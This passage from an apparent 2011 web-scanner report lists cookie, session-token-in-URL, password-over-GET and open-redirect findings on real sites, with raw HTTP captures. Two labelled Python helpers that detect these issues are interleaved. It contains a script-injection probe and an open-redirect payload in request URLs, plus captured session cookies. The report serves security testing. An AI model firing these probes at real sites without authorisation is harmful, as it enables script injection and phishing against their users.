The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /terms.aspx HTTP/1.1 Host: www.smartdevil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 49241 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:40 GMT; path=/; HttpOnly Set-Cookie: language=en-US; path=/; HttpOnly X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 20:28:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml"> <h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /spportal/spportalFlow.do?_flowExecutionKey=_c47FC5CD2-84B0-15BA-BBD6-7F2890FFCE5D_k1D7E1B65-A481-322E-8A3E-9052CB09A537%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00029D)%3C%2Fscript%3E HTTP/1.1 Host: www.supermedia.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: trafficSource="SP198c8\"; CstrStatus=U; campaign_track=BP%3AUpdate%20Your%20Profile%20Top
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the secure flag set:
language=en-US; path=/; HttpOnly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Products/ThumbshotsImages/IntegrationCode.aspx HTTP/1.1 Host: www.thumbshots.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: language=en-US; .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 35926 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 20:30:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml"> <h ...[SNIP]...
9. Session token in URL
There are 12 instances of this issue:
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
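Added example, not part of the report: a check that finds session-token-like parameters in a URL, both in the query string (a `PHPSESSID=` parameter as in the TRUSTe instance below) and as a Java-style `;jsessionid=` path parameter, plus a helper that rebuilds the URL without them. The list of parameter names is a heuristic assumed by this example; the second and third URLs in the usage are constructed.

```python
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Parameter names that usually carry a session token (heuristic; an assumption of this example).
TOKEN_PARAM_RE = re.compile(
    r"^(phpsessid|jsessionid|asp\.net_sessionid|sessionid|session_id|sid|wosid|token)$", re.I)

def _split_segment(segment):
    """'app;jsessionid=ABC' -> ('app', ['jsessionid=ABC']); path params stay as raw strings."""
    base, *params = segment.split(";")
    return base, params

def session_tokens_in_url(url):
    """Return (name, value) pairs for session-token-like parameters in the path or query."""
    parts = urlsplit(url)
    hits = []
    for segment in parts.path.split("/"):
        for param in _split_segment(segment)[1]:
            name, _, value = param.partition("=")
            if TOKEN_PARAM_RE.match(name):
                hits.append((name, value))
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if TOKEN_PARAM_RE.match(name):
            hits.append((name, value))
    return hits

def strip_session_tokens(url):
    """Rebuild the URL with session-token-like parameters removed from path and query."""
    parts = urlsplit(url)
    segments = []
    for segment in parts.path.split("/"):
        base, params = _split_segment(segment)
        kept = [p for p in params if not TOKEN_PARAM_RE.match(p.partition("=")[0])]
        segments.append(";".join([base] + kept))
    query = urlencode([(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
                       if not TOKEN_PARAM_RE.match(k)])
    return urlunsplit((parts.scheme, parts.netloc, "/".join(segments), query, parts.fragment))

if __name__ == "__main__":
    for url in (
        "http://privacy-policy.truste.com/click-with-confidence/ctv/en/truste.com?PHPSESSID=3599fb7ea791916a827c0d96401f1083",
        "http://example.test/app;jsessionid=ABC123/page?x=1&y=2",   # constructed
        "http://example.test/home?lang=en",                         # constructed
    ):
        print(session_tokens_in_url(url), "->", strip_session_tokens(url))
```

A name-based check will not catch a token embedded as an opaque path segment (compare the WebObjects-style redirect target in the store.apple.com response earlier in this report), so path components that look like random identifiers still need a manual look.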
GET /pvr.php?page=validate&url=www.supermedia.com&sealid=101 HTTP/1.1 Host: clicktoverify.truste.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:47:38 GMT Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4 X-Powered-By: PHP/5.1.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 10084
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Validation Page for Online Privacy Certification by TRUSTe</title> <meta n ...[SNIP]... <div id="logo"><a href="//privacy-policy.truste.com/click-with-confidence/ctv/en/truste.com?PHPSESSID=3599fb7ea791916a827c0d96401f1083" target="_blank"><img style="border: none" src="//privacy-policy.truste.com/certified-seal/ctv/en/truste.com/seal.png" /> ...[SNIP]...
GET /pub/smart-devil/19/697/322/x22 HTTP/1.1 Host: qa.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 Set-Cookie: bcookie="v=1&f06c167d-8118-455e-944d-937f03c4ba49"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:47:48 GMT; Path=/ Last-Modified: Fri, 12 Mar 2010 22:11:19 GMT If-Modified-Since: Fri, 12 Mar 2010 22:11:19 GMT Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Thu, 03 Feb 2011 20:33:42 GMT X-Cache: MISS from www.linkedin.com X-Cache-Lookup: MISS from www.linkedin.com:8080 Via: 1.0 www.linkedin.com (squid/3.0.STABLE20) Connection: close
GET /SmartDraw-com-SDS11-SmartDraw-2010/dp/B002OG5QUC/x22 HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:48:21 GMT Server: Server x-amz-id-1: 1KMV2BXDN94S7KQ0JZ7S p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: q5mVjA3yFvZi2IuxLAukAm69vnbnuFICbsgIGuLZMtThRGfrgK3+KrMswERBq2Ak Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=176-9787580-1042565; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Content-Length: 350615
GET /s/ HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:48:21 GMT Server: Server x-amz-id-1: 1B5Q0P8RKVGQFA9NY3SE p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: nI6zZw+w2fEj6f+WxBnPsVapnrhlNWadEc8XUA04/cH3a6X/znrumVfUTZLfgypT Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=183-0423924-6403059; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Content-Length: 83315
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html dir="ltr"><head><title>Blogger: Penetration Testing | Hoyt LLC - Post a Comment</title> <link href="http ...[SNIP]...
GET /in/troyd/x22 HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 Set-Cookie: bcookie="v=1&0cafcf8d-e068-4822-b520-7439b567b823"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:39:36 GMT; Path=/ Last-Modified: Thu, 27 Jan 2011 18:58:16 GMT If-Modified-Since: Thu, 27 Jan 2011 18:58:16 GMT Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Thu, 03 Feb 2011 20:25:29 GMT X-Cache: MISS from www.linkedin.com X-Cache-Lookup: MISS from www.linkedin.com:8080 Via: 1.0 www.linkedin.com (squid/3.0.STABLE20) Connection: close
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
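Added example, not part of the report: a static audit of HTML forms that collects every form containing a password input, resolves its action against the page URL, and flags the two conditions reported on this page, submission to an http:// target and submission with GET (including forms with no method attribute, which default to GET). The sample page and its forms are constructed for this example after the instances listed here.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class PasswordFormAuditor(HTMLParser):
    """Collect every form that contains a password input, with its resolved action and method."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {
                "action": attrs.get("action") or "",
                # HTML default: a form with no method attribute submits with GET.
                "method": (attrs.get("method") or "GET").upper(),
                "password_fields": [],
            }
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "text").lower() == "password":
                self._current["password_fields"].append(attrs.get("name") or "")

    def handle_endtag(self, tag):
        if tag == "form":
            self._finish()

    def close(self):
        super().close()
        self._finish()   # tolerate a form that is never closed

    def _finish(self):
        form, self._current = self._current, None
        if not form or not form["password_fields"]:
            return
        target = urljoin(self.page_url, form["action"])   # empty action: the page itself
        scheme = urlsplit(target).scheme.lower()
        form["target"] = target
        form["cleartext"] = scheme == "http"
        form["via_get"] = form["method"] == "GET"
        form["scripted"] = scheme == "javascript"   # submitted by script; cannot be judged statically
        self.forms.append(form)

def audit_password_forms(page_url, html):
    auditor = PasswordFormAuditor(page_url)
    auditor.feed(html)
    auditor.close()
    return auditor.forms

# Constructed page for this example, modelled on the forms reported above (not a real capture).
SAMPLE_PAGE_URL = "http://www.example.test/tutorials.html"
SAMPLE_HTML = """
<form name="SignIn" action="/acct/login.asp" method="post">
  <input type="text" name="login"><input type="password" name="pwd" id="pwd">
</form>
<form action="signup.html">
  <input type="password" name="password"><input type="password" name="password2">
</form>
<form action="https://secure.example.test/login" method="POST">
  <input type="password" name="password">
</form>
<form action="/search" method="get"><input type="text" name="q"></form>
"""

if __name__ == "__main__":
    for form in audit_password_forms(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(form["target"], form["method"], form["password_fields"],
              "cleartext" if form["cleartext"] else "", "GET" if form["via_get"] else "")
```

A form whose action is a javascript: URL (as on the advertise.tucows.com page above) is reported with `scripted` set and cannot be judged from the markup alone; the script decides where and how the credentials are sent, so that case needs a dynamic check.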
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.butterscotch.com/?src=tcv3video
The form contains the following password field:
password
Request
GET /?src=tcv3video HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.butterscotch.com/signup.html
The form contains the following password fields:
password
password2
Request
GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.butterscotch.com/signup.html
The form contains the following password fields:
password
password2
Request
GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.butterscotch.com/tutorials.html
The form contains the following password field:
password
Request
GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//afad3d0d022d23a44/a%3f was submitted in the r parameter. This caused a redirection to the following URL:
http://afad3d0d022d23a44/a?
Issue background
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:
Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.
If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:
The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.
Request
GET /a/bpix?adv=1050&id=5&r=http%3a//afad3d0d022d23a44/a%3f HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=176-9787580-1042565; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /SmartDraw-com-SDS11-SmartDraw-2010/dp/B002OG5QUC/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:21 GMT
Server: Server
x-amz-id-1: 1KMV2BXDN94S7KQ0JZ7S
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: q5mVjA3yFvZi2IuxLAukAm69vnbnuFICbsgIGuLZMtThRGfrgK3+KrMswERBq2Ak
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=176-9787580-1042565; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 350615
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=183-0423924-6403059; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /s/ HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:21 GMT
Server: Server
x-amz-id-1: 1B5Q0P8RKVGQFA9NY3SE
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: nI6zZw+w2fEj6f+WxBnPsVapnrhlNWadEc8XUA04/cH3a6X/znrumVfUTZLfgypT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-0423924-6403059; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 83315
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /c/mm49ryk/a-b-c-development-company-inc/x22 HTTP/1.1
Host: www.manta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /c/mm8136k/abc-development-inc/x22 HTTP/1.1
Host: www.manta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Modules/PostTo/Pages/ HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252f ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /productxml/?QuickList=1&ProductURL=Y&ShortName=Y&keywords=12370379&ThumbnailURL=Y HTTP/1.1
Host: www.overstock.com
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1787227/3-inBannerVideo2011_ViPrPf_New.swf?clickTag=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3aa3%2F3%2F0%2F%252a%2Ff%253B234670317%253B0-0%253B0%253B58524542%253B4307-300%2F250%253B40113270%2F40131057%2F2%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Efdr%253D234572024%253B0-0%253B0%253B32934908%253B4307-300%2F250%253B40173662%2F40191449%2F1%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Esscs%253D%253f&xmlFile=InBannerVideo_ViPrPf_LongboardVA_ronQ1.xml&taxonomyId=2&taxonomyType=sto&productCID=654321&keywords=&skus=12370379|12958970|11254000|12370390|10927901|11915556|13002490|10738953|12970899|12532546|12130097|12753446|11551645|066987|11144650|10355113|13197342|12941235|12370383|12978335|12453900
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /submit HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webplayed.xml?action=PlayerLoaded&videoSequence=1&userWhoEmbedded=anonymous&playSequence=0&collectionId=&autoPlay=true&percent=&playerVersion=flash/VeohPlayer-Freewheel.7.0.0.40&player=videodetails&inVeoh=true&flashVersion=WIN%2010,1,103,20&affiliateId=&cachebuster=0.22769851004704833&apiId=0E13378F-874E-DB67-3E0B-113A55BC57F9&positionTime=0&volumeLevel=NaN&totalVideos=1&truncated=false&videoId=18978294&idSource=veoh&bufferStateEntered=0&userTime=2.565&playTime=0&bufferTime=0&stopTime=2.565&pauseTime=0&playerSessionID=e5df0bf7-4865-174d-7ab5-b481ea4a57e3&client=false HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /media/redir.php?prof=88&camp=4679&affcode=cr197235&cid=7085856551|166328|SmartDraw&mType=e&networkType=search&url[]=http%3A%2F%2Finfo.mindjet.com%2FMindManagerB.html%3Fcmpg%3DAmericas_-_Google_US_Competitors/x22 HTTP/1.1
Host: 102.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 20:31:19 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=6de8bdeb-6bd9-2909-a31c-000018710444; expires=Wed, 04-May-2011 20:31:19 GMT; path=/; domain=.xg4ken.com
Location: http://info.mindjet.com/MindManagerB.html?cmpg=Americas_-_Google_US_Competitors/x22
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
_uid="a104_5562153497824379009";expires=Fri, 03 Feb 2012 21:07:44 GMT;domain=.fwmrm.net;path=/;
_auv="g12288~1.1296767264.0,12720.1296767264.0,^";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
_cvr="1296767264^11894^sg12288~sg11948^0~0^0.000000~5.000000,";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
_vr="1296767252.0+7564699552021921.248599~249349~331220~,";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
_sc="sg12288.1296767252.1296767264.28800.0.5,";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
_wr="g12288";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
_uid="a104_5562153497824379009";expires=Fri, 03 Feb 2012 21:07:32 GMT;domain=.fwmrm.net;path=/;
_vr="1296767252.0+7564699552021921.248599~249349~331220~,";expires=Sat, 05 Mar 2011 21:07:32 GMT;domain=.fwmrm.net;path=/;
_sc="sg12288.1296767252.1296767252.28800.0.0,";expires=Sat, 05 Mar 2011 21:07:32 GMT;domain=.fwmrm.net;path=/;
_wr="g12288";expires=Sat, 05 Mar 2011 21:07:32 GMT;domain=.fwmrm.net;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
